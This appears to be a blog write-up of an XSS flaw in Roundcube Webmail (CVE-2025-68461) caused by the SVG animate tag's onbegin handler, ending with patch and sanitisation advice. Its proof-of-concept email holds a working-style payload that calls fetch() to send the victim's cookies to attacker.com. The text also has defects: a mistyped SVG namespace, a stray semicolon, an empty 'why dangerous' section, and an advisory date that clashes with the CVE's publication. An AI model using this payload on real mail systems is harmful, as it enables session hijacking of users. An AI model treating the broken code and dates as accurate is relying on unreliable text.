CVE-2025-68461 - Exploiting XSS in Roundcube Webmail via SVG Animate Tag

Roundcube Webmail is a popular open-source webmail client often used in shared hosting or company environments. It’s the “email in your browser”—with a pretty interface, a focus on usability, and rich HTML support. But this same rich HTML is where some security problems can show up if not handled *very* carefully.

Recently, a new security vulnerability has been discovered: CVE-2025-68461. This bug affects Roundcube Webmail before version 1.5.12 and 1.6 before 1.6.12, and it’s classified as a Cross-Site Scripting (XSS) issue. The root of the problem? The way Roundcube parses SVG images and particularly how it handles the <animate> tag.

What’s the CVE-2025-68461 Issue?

Summary:
Roundcube Webmail, when displaying email messages that include SVG images, fails to properly sanitize content inside SVG files. Specifically, an attacker can embed JavaScript in the animate tag. When a victim opens the crafted email, the malicious code runs in the context of their browser session—potentially stealing cookies, session data, or doing actions as the user.

Why is it dangerous?

The Exploit: XSS via SVG Animate Tag

SVG files allow for rich graphics in emails. But JavaScript can hide inside SVG tags, especially since browsers support animation tags like <animate>, <set>, and event handlers.

Here’s an example of a malicious SVG email payload

<svg xmlns="http://www.w3.org/200/svg">;
  <animate attributeName="x" from="" to="100" dur="1s"
    onbegin="alert(document.cookie)">
  </animate>
</svg>

What happens here?

The <animate> tag’s onbegin handler runs JavaScript as soon as the animation starts.

- In insecure Roundcube, this SVG is displayed *as is*, and the attacker’s JavaScript is executed as soon as the victim opens the message.

*You can replace alert(document.cookie) with any JavaScript, including code that sends your session cookie to an attacker-controlled server.*

Full Proof-of-Concept (PoC) Email

Here’s an HTML email body you could use to test a vulnerable installation (for demo/authorized testing only!):

<html>
<body>
  <svg xmlns="http://www.w3.org/200/svg">;
    <animate attributeName="x" from="" to="100" dur="1s"
      onbegin="fetch('https://attacker.com/steal?cookie='+document.cookie)">
    </animate>
  </svg>
</body>
</html>

When the Roundcube server is not patched, this payload will execute the JavaScript and send the victim’s cookie to attacker.com.

*Note: Never test this on systems you do not own or control.*

References & Original Advisories

- Roundcube Security Advisory 2024-06-25
- CVE Record for CVE-2025-68461 on NVD
- GitHub: Roundcube Webmail

Patch Immediately:

Upgrade Roundcube to at least *1.5.12* (if you’re on the 1.5.x branch) or *1.6.12* (for 1.6.x users).

Disable SVG or sanitize SVG content:

Use proper sanitization libraries that strip out all event handlers and scripts from SVG before rendering.

Final Thoughts

XSS in webmail is one of the highest-impact bugs, especially when it requires no interaction: just an email view. This case shows once again why SVG parsing in emails is dangerous unless ALL scripts and handlers are removed.

If you run or depend on Roundcube Webmail, update right now. And remember—never trust user-controlled HTML, especially SVG.


*Stay safe! For more details, check the advisories above or track the official CVE page.*

Timeline

Published on: 12/18/2025 05:00:54 UTC
Last modified on: 02/23/2026 13:24:12 UTC